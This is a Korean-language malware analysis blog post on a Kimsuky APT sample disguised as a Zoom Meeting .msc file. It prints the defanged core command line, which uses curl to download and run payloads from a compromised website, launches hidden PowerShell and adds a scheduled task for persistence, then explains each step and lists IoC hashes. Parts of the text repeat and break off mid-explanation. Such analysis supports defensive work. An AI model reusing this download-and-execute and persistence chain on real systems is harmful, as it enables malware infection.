북한 APT Kimsuky(김수키)에서 만든줌 미팅(Zoom Meeting) 사칭 악성코드-Zoom Meeting(2024.9.28)
Contents
오늘은 북한 APT Kimsuky(김수키)에서 만든 좀 미팅(Zoom Meeting) 사칭 악성코드인 Zoom Meeting(2024.9.28)에 대해 글을 적어 보겠습니다.
해당 악성코드는 줌 비디오 커뮤니케이션 (Zoom Video Communications)에서 만든 줌(Zoom) 은 원격 회의, 채팅, 전화, 비즈니스용 이메일 및 캘린더를 포함한 통합 커뮤니케이션 서비스 (UCaaS) 플랫폼입니다. 해당 악성코드는 일단 아이콘부터 좀처럼 생겼지만, 그것은 아니고 msc 형식 방식을 취하는 것이 특징입니다. 일단 msc 내부 까보면 다음과 같은 코드들이 핵심입니다.
악성 행위 핵심코드
"C:\Windows\System32\cmd(.)exe" /c mode 15,1&curl -o "%temp%\zoom(.)exe"
"hxxp://www(.)atlanwelt(.)de/modules/mod_articles_category/tmpl/0910_simba
/dfef(.)php?de=call"&"%temp%\zoom(.)exe"&powershell -windowstyle hidden $a
=1&curl -o "%appdata%\sigm" "hxxp://www(.)atlanwelt(.)de/modules/mod_articl
es_category/tmpl/0910_simba/denyhg(.)php?de=single"&type "%appdata%\sigm">"
%appdata%\sigm(.)exe"&schtasks /create /tn TemporaryClearStatesesf /tr
"%appdata%\sigm(.)exe" /sc minute /mo 58 /f&curl -o "%appdata%\sigm(.)exe
.manifest" "hxxp://www(.)atlanwelt(.)de/modules/mod_articles_category/tmpl/0910_
simba/dvfh.php?de=singlefest"&exit
악성코드 설명
1.C:\Windows\System32\cmd(.)exe" /c mode 15,1:
콘솔 화면 크기를 설정
후속 명령어 실행을 위장하거나 단순히 명령어를 실행하기 위한 초기 단계
2.curl -o "%temp%\zoom(.)exe" "hxxp://www(.)atlanwelt(.)de/.../dfef.php?de=call":
curl 명령어를 사용해 hxxp://www(.)atlanwelt(.)de/.../dfef(.)php?de=call 에서 악성 파일을 다운로드
다운로드된 파일은 임시 폴더(%temp%)에 zoom(.)exe라는 이름으로 저장
3."%temp%\zoom.exe":
다운로드한 zoom(.)exe 파일을 실행
이거는 정상적인 줌인 것처럼 꾸민 것임
4.powershell -windowstyle hidden $a=1:
PowerShell을 숨겨진 창에서 실행
$a=1 는 주로 아무 의미 없는 더미 코드 PowerShell을 활성화하기 위한 기본 명령
5.curl -o "%appdata%\sigm" hxxp://www(.)atlanwelt(.)de/.../denyhg(.)php?de=single:
또 다른 …
해당 악성코드는 줌 비디오 커뮤니케이션 (Zoom Video Communications)에서 만든 줌(Zoom) 은 원격 회의, 채팅, 전화, 비즈니스용 이메일 및 캘린더를 포함한 통합 커뮤니케이션 서비스 (UCaaS) 플랫폼입니다. 해당 악성코드는 일단 아이콘부터 좀처럼 생겼지만, 그것은 아니고 msc 형식 방식을 취하는 것이 특징입니다. 일단 msc 내부 까보면 다음과 같은 코드들이 핵심입니다.
악성 행위 핵심코드
"C:\Windows\System32\cmd(.)exe" /c mode 15,1&curl -o "%temp%\zoom(.)exe"
"hxxp://www(.)atlanwelt(.)de/modules/mod_articles_category/tmpl/0910_simba
/dfef(.)php?de=call"&"%temp%\zoom(.)exe"&powershell -windowstyle hidden $a
=1&curl -o "%appdata%\sigm" "hxxp://www(.)atlanwelt(.)de/modules/mod_articl
es_category/tmpl/0910_simba/denyhg(.)php?de=single"&type "%appdata%\sigm">"
%appdata%\sigm(.)exe"&schtasks /create /tn TemporaryClearStatesesf /tr
"%appdata%\sigm(.)exe" /sc minute /mo 58 /f&curl -o "%appdata%\sigm(.)exe
.manifest" "hxxp://www(.)atlanwelt(.)de/modules/mod_articles_category/tmpl/0910_
simba/dvfh.php?de=singlefest"&exit
악성코드 설명
1.C:\Windows\System32\cmd(.)exe" /c mode 15,1:
콘솔 화면 크기를 설정
후속 명령어 실행을 위장하거나 단순히 명령어를 실행하기 위한 초기 단계
2.curl -o "%temp%\zoom(.)exe" "hxxp://www(.)atlanwelt(.)de/.../dfef.php?de=call":
curl 명령어를 사용해 hxxp://www(.)atlanwelt(.)de/.../dfef(.)php?de=call 에서 악성 파일을 다운로드
다운로드된 파일은 임시 폴더(%temp%)에 zoom(.)exe라는 이름으로 저장
3."%temp%\zoom.exe":
다운로드한 zoom(.)exe 파일을 실행
이거는 정상적인 줌인 것처럼 꾸민 것임
4.powershell -windowstyle hidden $a=1:
PowerShell을 숨겨진 창에서 실행
$a=1 는 주로 아무 의미 없는 더미 코드 PowerShell을 활성화하기 위한 기본 명령
5.curl -o "%appdata%\sigm" hxxp://www(.)atlanwelt(.)de/.../denyhg(.)php?de=single:
또 다른 …
IoC
ecb675f2570939d423595202abddf332b5029551
6c701204ca4f75718798ebc4b3ed726f
342c285efb8798fcba80d695cafc9ae1e097cecc72e01f25df85e4210e9fd638
6c701204ca4f75718798ebc4b3ed726f
342c285efb8798fcba80d695cafc9ae1e097cecc72e01f25df85e4210e9fd638